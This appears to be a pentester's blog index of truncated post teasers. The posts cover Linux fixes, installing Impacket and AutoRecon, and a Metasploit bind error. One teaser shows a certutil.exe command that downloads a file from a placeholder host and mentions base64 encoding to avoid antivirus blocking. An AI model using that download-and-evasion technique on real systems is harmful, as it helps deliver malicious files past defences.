After connecting a VPN on Linux (my case an Ubuntu) that resolv.conf is not updated and you can’t resolve names from that network as expected. After searching a bit I found this website that gave me a solution. You can check in detail here: https://dev.to/setevoy/arch-linux-openvpn–resolvconf-is-not-updated-2470 After connection to the VPN has been performed, we can observe that resolv.conf hasn’t been updated. $ cat /etc/resolv.conf Modify your opvn file and these
Impacket is a collection of Python classes for working with network protocols. https://github.com/SecureAuthCorp/impacket Installation process: Download last release. Extract the file. Install the requirements. Install the package. $ pip install -r requirements.txt If we have an error installing wheel package, we can do it individually. $ pip install wheel Now run the configuration script. $ python setup.py bdist_wheel Let’s try to install the requirements again: $ pip install -r requirements.txt
Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from https://www.bleepingcomputer.com. The trick is based on a base64 encoding file when sending the
AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon Run installation script $ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner
(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable
Using Metasploit I’ve sometimes seen this error: [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:1234). To solve it: List processes listening on port 1234 lsof -i :1234 Kill a process with process ID 5678 kill -9 5678
I received this annoying message every time I logged-in in my Linux distro. After a small search with Google I found this solution: cd .cofig mv monitors.xml monitors.xml.oldexit Restart and you won’t see that message again.
To add a new directory to your home path you just have to append the new directory to the PATH: $vim .bashrc In the last line of the file just add this: export PATH=$PATH:/homr/username/newDirectory/ Finally, restart your terminal.
kali@kali:~/downloads$ sudo dpkg -i terminus-1.0.106-linux.deb kali@kali:~/downloads$ sudo apt-get -f install kali@kali:~/downloads$ sudo dpkg -i terminus-1.0.106-linux.deb